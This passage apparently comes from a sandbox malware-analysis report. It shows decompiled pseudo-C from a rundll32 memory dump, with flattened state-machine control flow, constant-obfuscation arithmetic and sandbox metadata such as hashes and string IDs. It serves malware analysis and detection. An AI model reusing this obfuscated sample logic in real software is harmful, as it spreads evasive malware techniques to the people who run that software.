                                                                                                                                    				_v328 = _v328 / _t782;
                                                                                                                                    				_v328 = _v328 + 0xe73f;
                                                                                                                                    				_v328 = _v328 ^ 0x01f1132e;
                                                                                                                                    				_v140 = 0x403514;
                                                                                                                                    				_v140 = _v140 + 0xffff4e06;
                                                                                                                                    				_v140 = _v140 ^ 0x0039264a;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t783 = 0xf0ee26a;
                                                                                                                                    					_t842 = 0xbf4f028;
                                                                                                                                    					_t716 = 0xc1f5c56;
                                                                                                                                    					do {
                                                                                                                                    						while(1) {
                                                                                                                                    							L2:
                                                                                                                                    							_t878 = _t766 - _t716;
                                                                                                                                    							if(_t878 > 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							if(_t878 == 0) {
                                                                                                                                    								_push(_v160);
                                                                                                                                    								_push(_v112);
                                                                                                                                    								_t732 = E002DDCF7(_v396, 0x2c1884, __eflags);
                                                                                                                                    								_push(_v392);
                                                                                                                                    								_t866 = _t732;
                                                                                                                                    								_push(_v384);
                                                                                                                                    								_t733 = E002DDCF7(_v152, 0x2c1924, __eflags);
                                                                                                                                    								_v76 = _v124;
                                                                                                                                    								_t735 = E002CCB52(_v376, _t866, _v268, _v116, _v144);
                                                                                                                                    								_v68 = _v68 & 0x00000000;
                                                                                                                                    								_v72 = _t866;
                                                                                                                                    								_v80 = 2 + _t735 * 2;
                                                                                                                                    								_v60 =  &_v80;
                                                                                                                                    								_v92 = _v88;
                                                                                                                                    								_v64 = 1;
                                                                                                                                    								_t741 = E002C8D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
                                                                                                                                    								_t875 =  &(_t875[0x11]);
                                                                                                                                    								__eflags = _t741 - _v304;
                                                                                                                                    								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
                                                                                                                                    								E002CA8B0(_v296, _t866, _v196);
                                                                                                                                    								E002CA8B0(_v360, _t733, _v288);
                                                                                                                                    								_t864 = 0xf9e92c1;
                                                                                                                                    								goto L24;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t766 == 0xdec32e) {
                                                                                                                                    									_t746 =  *0x2e3dfc; // 0x0
                                                                                                                                    									E002D8519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
                                                                                                                                    									_t766 = _t864;
                                                                                                                                    									while(1) {
                                                                                                                                    										L1:
                                                                                                                                    										_t783 = 0xf0ee26a;
                                                                                                                                    										_t842 = 0xbf4f028;
                                                                                                                                    										_t716 = 0xc1f5c56;
                                                                                                                                    										goto L2;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									if(_t766 == 0x41de8e2) {
                                                                                                                                    										_t766 = 0xe078043;
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t766 == _t868) {
                                                                                                                                    											_push(_v128);
                                                                                                                                    											_push(_v184);
                                                                                                                                    											_t871 = E002DDCF7(_v372, 0x2c1904, __eflags);
                                                                                                                                    											_t585 =  &_v300; // 0x3e0de8e7
                                                                                                                                    											_v44 =  *_t585;
                                                                                                                                    											_v40 = _v252;
                                                                                                                                    											_pop(_t807);
                                                                                                                                    											_v36 = _v100;
                                                                                                                                    											_t752 =  *0x2e3dfc; // 0x0
                                                                                                                                    											_t754 =  *0x2e3dfc; // 0x0
                                                                                                                                    											_t755 =  *0x2e3dfc; // 0x0
                                                                                                                                    											_t757 = E002DD84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
                                                                                                                                    											_t875 =  &(_t875[0xd]);
                                                                                                                                    											__eflags = _t757 - _v348;
                                                                                                                                    											if(_t757 != _v348) {
                                                                                                                                    												_t766 = 0xdec32e;
                                                                                                                                    											} else {
                                                                                                                                    												_t766 = _t864;
                                                                                                                                    												_t873 = 1;
                                                                                                                                    											}
                                                                                                                                    											E002CA8B0(_v364, _t871, _v168);
                                                                                                                                    											goto L24;
                                                                                                                                    										} else {
                                                                                                                                    											_t882 = _t766 - _t842;
                                                                                                                                    											if(_t766 == _t842) {
                                                                                                                                    												_push(_v192);
                                                                                                                                    												_push(_v332);
                                                                                                                                    												_t759 = E002DDCF7(_v108, 0x2c18b4, _t882);
                                                                                                                                    												_pop(_t812);
                                                                                                                                    												_t760 =  *0x2e3dfc; // 0x0
                                                                                                                                    												E002E0B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
                                                                                                                                    												_t766 =  ==  ? 0xf0ee26a : _t864;
                                                                                                                                    												E002CA8B0(_v340, _t759, _v380);
                                                                                                                                    												L23:
                                                                                                                                    												_t875 =  &(_t875[0xb]);
                                                                                                                                    												L24:
                                                                                                                                    												_t842 = 0xbf4f028;
                                                                                                                                    												_t783 = 0xf0ee26a;
                                                                                                                                    												_t868 = 0x80c65ec;
                                                                                                                                    												_t716 = 0xc1f5c56;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										goto L25;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L20:
                                                                                                                                    							return _t873;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t766 - 0xe078043;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							_push(_v264);
                                                                                                                                    							_push(_v352);
                                                                                                                                    							_t717 = E002DDCF7(_v324, 0x2c18e4, __eflags);
                                                                                                                                    							_push(_v248);
                                                                                                                                    							_push(_v180);
                                                                                                                                    							_t718 = E002DDCF7(_v240, 0x2c1814, __eflags);
                                                                                                                                    							_t665 =  &_v172; // 0x39264a
                                                                                                                                    							__eflags = E002C9462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
                                                                                                                                    							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
                                                                                                                                    							E002CA8B0(_v216, _t717, _v224);
                                                                                                                                    							E002CA8B0(_v148, _t718, _v156);
                                                                                                                                    							_t864 = 0xf9e92c1;
                                                                                                                                    							goto L23;
                                                                                                                                    						} else {
                                                                                                                                    							__eflags = _t766 - _t783;
                                                                                                                                    							if(_t766 == _t783) {
                                                                                                                                    								_t848 =  *0x2e3dfc; // 0x0
                                                                                                                                    								_push(_t783);
                                                                                                                                    								_push(_t783);
                                                                                                                                    								_t792 = E002C7FF2( *((intOrPtr*)(_t848 + 0x54)));
                                                                                                                                    								_t730 =  *0x2e3dfc; // 0x0
                                                                                                                                    								__eflags = _t792;
                                                                                                                                    								_t766 =  !=  ? _t868 : _t864;
                                                                                                                                    								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
                                                                                                                                    								goto L1;
                                                                                                                                    							} else {
                                                                                                                                    								__eflags = _t766 - _t864;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									goto L25;
                                                                                                                                    								} else {
                                                                                                                                    									_t646 =  &_v140; // 0x39264a
                                                                                                                                    									E002C957D(_v96, _v132, _v328, _v208,  *_t646);
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						goto L20;
                                                                                                                                    						L25:
                                                                                                                                    					} while (_t766 != 0x1d0239b);
                                                                                                                                    					goto L20;
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    0x002c2e75
                                                                                                                                    0x002c2e80
                                                                                                                                    0x002c2e8b
                                                                                                                                    0x002c2e96
                                                                                                                                    0x002c2ea1
                                                                                                                                    0x002c2eac
                                                                                                                                    0x002c2eb7
                                                                                                                                    0x002c2ec2
                                                                                                                                    0x002c2ed5
                                                                                                                                    0x002c2ed6
                                                                                                                                    0x002c2edd
                                                                                                                                    0x002c2ee8
                                                                                                                                    0x002c2ef3
                                                                                                                                    0x002c2f06
                                                                                                                                    0x002c2f0d
                                                                                                                                    0x002c2f18
                                                                                                                                    0x002c2f2c
                                                                                                                                    0x002c2f33
                                                                                                                                    0x002c2f3e
                                                                                                                                    0x002c2f46
                                                                                                                                    0x002c2f4e
                                                                                                                                    0x002c2f53
                                                                                                                                    0x002c2f58
                                                                                                                                    0x002c2f60
                                                                                                                                    0x002c2f6b
                                                                                                                                    0x002c2f7e
                                                                                                                                    0x002c2f85
                                                                                                                                    0x002c2f90
                                                                                                                                    0x002c2fa3
                                                                                                                                    0x002c2fb2
                                                                                                                                    0x002c2fb9
                                                                                                                                    0x002c2fc4
                                                                                                                                    0x002c2fcf
                                                                                                                                    0x002c2fda
                                                                                                                                    0x002c2fe5
                                                                                                                                    0x002c2ff0
                                                                                                                                    0x002c2ffb
                                                                                                                                    0x002c3006
                                                                                                                                    0x002c300e
                                                                                                                                    0x002c3016
                                                                                                                                    0x002c301b
                                                                                                                                    0x002c3023
                                                                                                                                    0x002c302b
                                                                                                                                    0x002c3036
                                                                                                                                    0x002c3041
                                                                                                                                    0x002c304c
                                                                                                                                    0x002c3057
                                                                                                                                    0x002c3062
                                                                                                                                    0x002c306d
                                                                                                                                    0x002c3078
                                                                                                                                    0x002c3083
                                                                                                                                    0x002c308e
                                                                                                                                    0x002c3096
                                                                                                                                    0x002c30a3
                                                                                                                                    0x002c30a7
                                                                                                                                    0x002c30af
                                                                                                                                    0x002c30b7
                                                                                                                                    0x002c30bf
                                                                                                                                    0x002c30c7
                                                                                                                                    0x002c30cf
                                                                                                                                    0x002c30d7
                                                                                                                                    0x002c30df
                                                                                                                                    0x002c30e9
                                                                                                                                    0x002c30ee
                                                                                                                                    0x002c30f6
                                                                                                                                    0x002c30fb
                                                                                                                                    0x002c3103
                                                                                                                                    0x002c310e
                                                                                                                                    0x002c3119
                                                                                                                                    0x002c3121
                                                                                                                                    0x002c312c
                                                                                                                                    0x002c3141
                                                                                                                                    0x002c3144
                                                                                                                                    0x002c314b
                                                                                                                                    0x002c3156
                                                                                                                                    0x002c3169
                                                                                                                                    0x002c3170
                                                                                                                                    0x002c317b
                                                                                                                                    0x002c3191
                                                                                                                                    0x002c3198
                                                                                                                                    0x002c31a3
                                                                                                                                    0x002c31ab
                                                                                                                                    0x002c31b0
                                                                                                                                    0x002c31b4
                                                                                                                                    0x002c31bc
                                                                                                                                    0x002c31c4
                                                                                                                                    0x002c31cc
                                                                                                                                    0x002c31d4
                                                                                                                                    0x002c31dc
                                                                                                                                    0x002c31e4
                                                                                                                                    0x002c31f4
                                                                                                                                    0x002c31fc
                                                                                                                                    0x002c3201
                                                                                                                                    0x002c3207
                                                                                                                                    0x002c320f
                                                                                                                                    0x002c3221
                                                                                                                                    0x002c3226
                                                                                                                                    0x002c322f
                                                                                                                                    0x002c323a
                                                                                                                                    0x002c3242
                                                                                                                                    0x002c324a
                                                                                                                                    0x002c3252
                                                                                                                                    0x002c325a
                                                                                                                                    0x002c3265
                                                                                                                                    0x002c326d
                                                                                                                                    0x002c3278
                                                                                                                                    0x002c3284
                                                                                                                                    0x002c3289
                                                                                                                                    0x002c3293
                                                                                                                                    0x002c3298
                                                                                                                                    0x002c32a2
                                                                                                                                    0x002c32a5
                                                                                                                                    0x002c32a9
                                                                                                                                    0x002c32b1
                                                                                                                                    0x002c32c2
                                                                                                                                    0x002c32c5
                                                                                                                                    0x002c32cc
                                                                                                                                    0x002c32d7
                                                                                                                                    0x002c32e2
                                                                                                                                    0x002c32ed
                                                                                                                                    0x002c32f8
                                                                                                                                    0x002c3303
                                                                                                                                    0x002c330b
                                                                                                                                    0x002c3313
                                                                                                                                    0x002c331b
                                                                                                                                    0x002c3323
                                                                                                                                    0x002c332b
                                                                                                                                    0x002c3336
                                                                                                                                    0x002c3341
                                                                                                                                    0x002c334c
                                                                                                                                    0x002c3357
                                                                                                                                    0x002c335e
                                                                                                                                    0x002c3369
                                                                                                                                    0x002c3371
                                                                                                                                    0x002c3379
                                                                                                                                    0x002c3381
                                                                                                                                    0x002c3389
                                                                                                                                    0x002c3394
                                                                                                                                    0x002c33a7
                                                                                                                                    0x002c33ae
                                                                                                                                    0x002c33b9
                                                                                                                                    0x002c33c1
                                                                                                                                    0x002c33c6
                                                                                                                                    0x002c33cb
                                                                                                                                    0x002c33d3
                                                                                                                                    0x002c33db
                                                                                                                                    0x002c33e0
                                                                                                                                    0x002c33e8
                                                                                                                                    0x002c33f0
                                                                                                                                    0x002c33f8
                                                                                                                                    0x002c3403
                                                                                                                                    0x002c340e
                                                                                                                                    0x002c3416
                                                                                                                                    0x002c3421
                                                                                                                                    0x002c342d
                                                                                                                                    0x002c3430
                                                                                                                                    0x002c3434
                                                                                                                                    0x002c343c
                                                                                                                                    0x002c3444
                                                                                                                                    0x002c344c
                                                                                                                                    0x002c3454
                                                                                                                                    0x002c3459
                                                                                                                                    0x002c3461
                                                                                                                                    0x002c3466
                                                                                                                                    0x002c346e
                                                                                                                                    0x002c3479
                                                                                                                                    0x002c3484
                                                                                                                                    0x002c348f
                                                                                                                                    0x002c349a
                                                                                                                                    0x002c34a5
                                                                                                                                    0x002c34ad
                                                                                                                                    0x002c34b8
                                                                                                                                    0x002c34c3
                                                                                                                                    0x002c34ce
                                                                                                                                    0x002c34d9
                                                                                                                                    0x002c34e4
                                                                                                                                    0x002c34ec
                                                                                                                                    0x002c34f1
                                                                                                                                    0x002c34f6
                                                                                                                                    0x002c34fe
                                                                                                                                    0x002c3506
                                                                                                                                    0x002c3511
                                                                                                                                    0x002c351c
                                                                                                                                    0x002c3527
                                                                                                                                    0x002c3532
                                                                                                                                    0x002c353d
                                                                                                                                    0x002c354a
                                                                                                                                    0x002c3555
                                                                                                                                    0x002c355a
                                                                                                                                    0x002c3565
                                                                                                                                    0x002c356a
                                                                                                                                    0x002c3575
                                                                                                                                    0x002c3580
                                                                                                                                    0x002c3588
                                                                                                                                    0x002c3593
                                                                                                                                    0x002c359e

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                                    • API String ID: 0-1427316221
                                                                                                                                    • Opcode ID: ffe9e2fc3f28048f5b75d353ccf2b13884ac23de82ddb087ee2cdbb94733d9d5
                                                                                                                                    • Instruction ID: b4178dea05b05a3d662dcfe57b273e05c749e37b76ac7454d1e9b4b46837570f
                                                                                                                                    • Opcode Fuzzy Hash: ffe9e2fc3f28048f5b75d353ccf2b13884ac23de82ddb087ee2cdbb94733d9d5
                                                                                                                                    • Instruction Fuzzy Hash: 4072EF715093818FD3B8CF25C58AB9BBBE1FBC5304F108A1DE1DA96260DBB58959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002DAE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				char _v12;
                                                                                                                                    				char _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				char _v28;
                                                                                                                                    				char _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				unsigned int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v184;
                                                                                                                                    				signed int _v188;
                                                                                                                                    				signed int _v192;
                                                                                                                                    				signed int _v196;
                                                                                                                                    				signed int _v200;
                                                                                                                                    				signed int _v204;
                                                                                                                                    				signed int _v208;
                                                                                                                                    				signed int _v212;
                                                                                                                                    				signed int _v216;
                                                                                                                                    				signed int _v220;
                                                                                                                                    				signed int _v224;
                                                                                                                                    				signed int _v228;
                                                                                                                                    				signed int _v232;
                                                                                                                                    				signed int _v236;
                                                                                                                                    				signed int _v240;
                                                                                                                                    				signed int _v244;
                                                                                                                                    				signed int _v248;
                                                                                                                                    				signed int _v252;
                                                                                                                                    				signed int _v256;
                                                                                                                                    				signed int _v260;
                                                                                                                                    				signed int _v264;
                                                                                                                                    				signed int _v268;
                                                                                                                                    				signed int _v272;
                                                                                                                                    				void* _t537;
                                                                                                                                    				void* _t566;
                                                                                                                                    				void* _t567;
                                                                                                                                    				intOrPtr _t573;
                                                                                                                                    				void* _t575;
                                                                                                                                    				void* _t577;
                                                                                                                                    				void* _t585;
                                                                                                                                    				void* _t588;
                                                                                                                                    				void* _t594;
                                                                                                                                    				void* _t596;
                                                                                                                                    				signed int _t603;
                                                                                                                                    				signed int _t604;
                                                                                                                                    				signed int _t605;
                                                                                                                                    				signed int _t606;
                                                                                                                                    				signed int _t607;
                                                                                                                                    				signed int _t608;
                                                                                                                                    				signed int _t609;
                                                                                                                                    				signed int _t610;
                                                                                                                                    				void* _t611;
                                                                                                                                    				void* _t633;
                                                                                                                                    				void* _t660;
                                                                                                                                    				void* _t675;
                                                                                                                                    				intOrPtr _t677;
                                                                                                                                    				intOrPtr _t680;
                                                                                                                                    				signed int* _t682;
                                                                                                                                    				void* _t685;
                                                                                                                                    
                                                                                                                                    				_push(_a20);
                                                                                                                                    				_t677 = __edx;
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_v24 = __edx;
                                                                                                                                    				_push(0x20);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t537);
                                                                                                                                    				_v8 = 0x673696;
                                                                                                                                    				_t680 = 0;
                                                                                                                                    				_v4 = 0;
                                                                                                                                    				_t682 =  &(( &_v272)[7]);
                                                                                                                                    				_v144 = 0xf00d33;
                                                                                                                                    				_v144 = _v144 | 0x228e8b2e;
                                                                                                                                    				_t596 = 0x1d3710;
                                                                                                                                    				_v144 = _v144 >> 8;
                                                                                                                                    				_v144 = _v144 ^ 0x0022fe8f;
                                                                                                                                    				_v244 = 0xde08aa;
                                                                                                                                    				_t603 = 0x17;
                                                                                                                                    				_v244 = _v244 / _t603;
                                                                                                                                    				_v244 = _v244 + 0xffff54ea;
                                                                                                                                    				_v244 = _v244 << 0xa;
                                                                                                                                    				_v244 = _v244 ^ 0x23f0fc00;
                                                                                                                                    				_v224 = 0x36cb35;
                                                                                                                                    				_v224 = _v224 | 0xc39aec51;
                                                                                                                                    				_v224 = _v224 + 0x9146;
                                                                                                                                    				_t604 = 0x62;
                                                                                                                                    				_v224 = _v224 * 0x70;
                                                                                                                                    				_v224 = _v224 ^ 0xa3c851d0;
                                                                                                                                    				_v116 = 0xf2e64b;
                                                                                                                                    				_v116 = _v116 << 5;
                                                                                                                                    				_v116 = _v116 ^ 0x1e5cc960;
                                                                                                                                    				_v248 = 0x2b7d5f;
                                                                                                                                    				_t43 =  &_v248; // 0x2b7d5f
                                                                                                                                    				_v248 =  *_t43 * 0x53;
                                                                                                                                    				_v248 = _v248 + 0x8561;
                                                                                                                                    				_v248 = _v248 | 0xae4dc352;
                                                                                                                                    				_v248 = _v248 ^ 0xae5feb7e;
                                                                                                                                    				_v80 = 0xe6036b;
                                                                                                                                    				_v80 = _v80 * 0xb;
                                                                                                                                    				_v80 = _v80 ^ 0x09e22599;
                                                                                                                                    				_v240 = 0x5b8b4f;
                                                                                                                                    				_v240 = _v240 + 0xffffe1e0;
                                                                                                                                    				_v240 = _v240 ^ 0xb7b7812a;
                                                                                                                                    				_v240 = _v240 + 0xffff41e0;
                                                                                                                                    				_v240 = _v240 ^ 0xb7ec2de5;
                                                                                                                                    				_v232 = 0xf81ab6;
                                                                                                                                    				_v232 = _v232 ^ 0xa56b9217;
                                                                                                                                    				_v232 = _v232 | 0x431a55e8;
                                                                                                                                    				_v232 = _v232 << 7;
                                                                                                                                    				_v232 = _v232 ^ 0xcdeef480;
                                                                                                                                    				_v184 = 0xddfe73;
                                                                                                                                    				_v184 = _v184 * 0x26;
                                                                                                                                    				_v184 = _v184 << 8;
                                                                                                                                    				_v184 = _v184 ^ 0xf3c51200;
                                                                                                                                    				_v120 = 0x644fb5;
                                                                                                                                    				_v120 = _v120 >> 6;
                                                                                                                                    				_v120 = _v120 / _t604;
                                                                                                                                    				_v120 = _v120 ^ 0x00000418;
                                                                                                                                    				_v60 = 0xc6ff9f;
                                                                                                                                    				_v60 = _v60 ^ 0x0d96ce7d;
                                                                                                                                    				_v60 = _v60 ^ 0x0d5031e2;
                                                                                                                                    				_v204 = 0xeedb74;
                                                                                                                                    				_v204 = _v204 >> 0xb;
                                                                                                                                    				_v204 = _v204 >> 0xa;
                                                                                                                                    				_v204 = _v204 | 0xba569879;
                                                                                                                                    				_v204 = _v204 ^ 0xba56987f;
                                                                                                                                    				_v268 = 0x9a0618;
                                                                                                                                    				_v268 = _v268 ^ 0x10270239;
                                                                                                                                    				_v268 = _v268 ^ 0x733075d3;
                                                                                                                                    				_t605 = 0x16;
                                                                                                                                    				_v268 = _v268 / _t605;
                                                                                                                                    				_v268 = _v268 ^ 0x04865c22;
                                                                                                                                    				_v160 = 0x655fad;
                                                                                                                                    				_v160 = _v160 >> 3;
                                                                                                                                    				_v160 = _v160 >> 4;
                                                                                                                                    				_v160 = _v160 ^ 0x0009a8dc;
                                                                                                                                    				_v272 = 0x9202;
                                                                                                                                    				_v272 = _v272 | 0xfb135803;
                                                                                                                                    				_t606 = 0x41;
                                                                                                                                    				_v272 = _v272 * 0x2c;
                                                                                                                                    				_v272 = _v272 << 1;
                                                                                                                                    				_v272 = _v272 ^ 0x4ed07035;
                                                                                                                                    				_v100 = 0x536289;
                                                                                                                                    				_v100 = _v100 << 9;
                                                                                                                                    				_v100 = _v100 ^ 0xa6cd28cf;
                                                                                                                                    				_v108 = 0xf021d8;
                                                                                                                                    				_v108 = _v108 ^ 0x8f8b6ed2;
                                                                                                                                    				_v108 = _v108 ^ 0x8f701d8c;
                                                                                                                                    				_v152 = 0xcba027;
                                                                                                                                    				_v152 = _v152 ^ 0xce0cd109;
                                                                                                                                    				_v152 = _v152 | 0x7dfb06f6;
                                                                                                                                    				_v152 = _v152 ^ 0xfff88f5e;
                                                                                                                                    				_v252 = 0xf09c41;
                                                                                                                                    				_v252 = _v252 + 0x8e2a;
                                                                                                                                    				_v252 = _v252 << 3;
                                                                                                                                    				_v252 = _v252 | 0xdb831f2c;
                                                                                                                                    				_v252 = _v252 ^ 0xdf846234;
                                                                                                                                    				_v260 = 0x3d692f;
                                                                                                                                    				_v260 = _v260 << 2;
                                                                                                                                    				_v260 = _v260 | 0xbfb4a027;
                                                                                                                                    				_v260 = _v260 + 0x643;
                                                                                                                                    				_v260 = _v260 ^ 0xbffb0fde;
                                                                                                                                    				_v92 = 0x80bca7;
                                                                                                                                    				_v92 = _v92 >> 0xa;
                                                                                                                                    				_v92 = _v92 ^ 0x00038c1c;
                                                                                                                                    				_v228 = 0xbbbc43;
                                                                                                                                    				_v228 = _v228 | 0x61282476;
                                                                                                                                    				_v228 = _v228 + 0xffff6ee2;
                                                                                                                                    				_v228 = _v228 * 0x69;
                                                                                                                                    				_v228 = _v228 ^ 0x15ccd750;
                                                                                                                                    				_v236 = 0xc2062f;
                                                                                                                                    				_v236 = _v236 | 0xf7f3ef67;
                                                                                                                                    				_v236 = _v236 * 0x5c;
                                                                                                                                    				_v236 = _v236 ^ 0x1ba01eed;
                                                                                                                                    				_v128 = 0xa773bc;
                                                                                                                                    				_v128 = _v128 << 0x10;
                                                                                                                                    				_v128 = _v128 | 0xe162daa5;
                                                                                                                                    				_v128 = _v128 ^ 0xf3f36b57;
                                                                                                                                    				_v136 = 0x3287f3;
                                                                                                                                    				_v136 = _v136 / _t606;
                                                                                                                                    				_v136 = _v136 >> 9;
                                                                                                                                    				_v136 = _v136 ^ 0x000c37d1;
                                                                                                                                    				_v104 = 0x8d5fef;
                                                                                                                                    				_v104 = _v104 + 0xffff56ea;
                                                                                                                                    				_v104 = _v104 ^ 0x008f942b;
                                                                                                                                    				_v44 = 0xd6bac6;
                                                                                                                                    				_v44 = _v44 * 0x7f;
                                                                                                                                    				_v44 = _v44 ^ 0x6a80c639;
                                                                                                                                    				_v148 = 0xa4165e;
                                                                                                                                    				_v148 = _v148 * 0x13;
                                                                                                                                    				_v148 = _v148 | 0x84e82f79;
                                                                                                                                    				_v148 = _v148 ^ 0x8cef9599;
                                                                                                                                    				_v96 = 0xfc4916;
                                                                                                                                    				_v96 = _v96 + 0xffff0795;
                                                                                                                                    				_v96 = _v96 ^ 0x00f5cebb;
                                                                                                                                    				_v132 = 0xd5d7c2;
                                                                                                                                    				_v132 = _v132 >> 0x10;
                                                                                                                                    				_v132 = _v132 << 0xd;
                                                                                                                                    				_v132 = _v132 ^ 0x0010cc3c;
                                                                                                                                    				_v264 = 0xf6e8cb;
                                                                                                                                    				_v264 = _v264 + 0x6576;
                                                                                                                                    				_v264 = _v264 + 0x7b15;
                                                                                                                                    				_v264 = _v264 + 0x6b9c;
                                                                                                                                    				_v264 = _v264 ^ 0x00fe3ec7;
                                                                                                                                    				_v208 = 0x3a8541;
                                                                                                                                    				_v208 = _v208 | 0x57459f57;
                                                                                                                                    				_v208 = _v208 ^ 0x66631a8c;
                                                                                                                                    				_v208 = _v208 | 0x178bfabb;
                                                                                                                                    				_v208 = _v208 ^ 0x379a2cb6;
                                                                                                                                    				_v56 = 0x33c5e6;
                                                                                                                                    				_v56 = _v56 + 0x441;
                                                                                                                                    				_v56 = _v56 ^ 0x0035e6a0;
                                                                                                                                    				_v172 = 0x2bd4df;
                                                                                                                                    				_v172 = _v172 + 0xda1f;
                                                                                                                                    				_v172 = _v172 + 0x8171;
                                                                                                                                    				_v172 = _v172 ^ 0x002cd084;
                                                                                                                                    				_v48 = 0x796d26;
                                                                                                                                    				_v48 = _v48 + 0xffff3152;
                                                                                                                                    				_v48 = _v48 ^ 0x00766b67;
                                                                                                                                    				_v88 = 0xfc738c;
                                                                                                                                    				_v88 = _v88 << 0xe;
                                                                                                                                    				_v88 = _v88 ^ 0x1ce8da45;
                                                                                                                                    				_v140 = 0x79fdd0;
                                                                                                                                    				_v140 = _v140 >> 0xe;
                                                                                                                                    				_v140 = _v140 * 0x78;
                                                                                                                                    				_v140 = _v140 ^ 0x000f2c53;
                                                                                                                                    				_v64 = 0xd0b1f6;
                                                                                                                                    				_v64 = _v64 >> 9;
                                                                                                                                    				_v64 = _v64 ^ 0x000411a2;
                                                                                                                                    				_v200 = 0xaa2240;
                                                                                                                                    				_v200 = _v200 | 0x35f3f2d4;
                                                                                                                                    				_v200 = _v200 + 0x4147;
                                                                                                                                    				_v200 = _v200 + 0xffff1702;
                                                                                                                                    				_v200 = _v200 ^ 0x35f16a60;
                                                                                                                                    				_v52 = 0x980f89;
                                                                                                                                    				_v52 = _v52 ^ 0xc15a5b47;
                                                                                                                                    				_v52 = _v52 ^ 0xc1c323e9;
                                                                                                                                    				_v216 = 0xb7a8b5;
                                                                                                                                    				_v216 = _v216 >> 3;
                                                                                                                                    				_v216 = _v216 ^ 0xa2f7ad91;
                                                                                                                                    				_v216 = _v216 + 0xfffff0a8;
                                                                                                                                    				_v216 = _v216 ^ 0xa2ec62b8;
                                                                                                                                    				_v72 = 0x73581d;
                                                                                                                                    				_v72 = _v72 + 0xffffc838;
                                                                                                                                    				_v72 = _v72 ^ 0x00777119;
                                                                                                                                    				_v164 = 0x873053;
                                                                                                                                    				_v164 = _v164 ^ 0xefe323e3;
                                                                                                                                    				_v164 = _v164 | 0xd91bba05;
                                                                                                                                    				_v164 = _v164 ^ 0xff705bac;
                                                                                                                                    				_v40 = 0xf8d5df;
                                                                                                                                    				_v40 = _v40 ^ 0x79f853d7;
                                                                                                                                    				_v40 = _v40 ^ 0x79053437;
                                                                                                                                    				_v192 = 0x180af0;
                                                                                                                                    				_v192 = _v192 + 0xffff4c14;
                                                                                                                                    				_v192 = _v192 << 8;
                                                                                                                                    				_v192 = _v192 + 0x2aad;
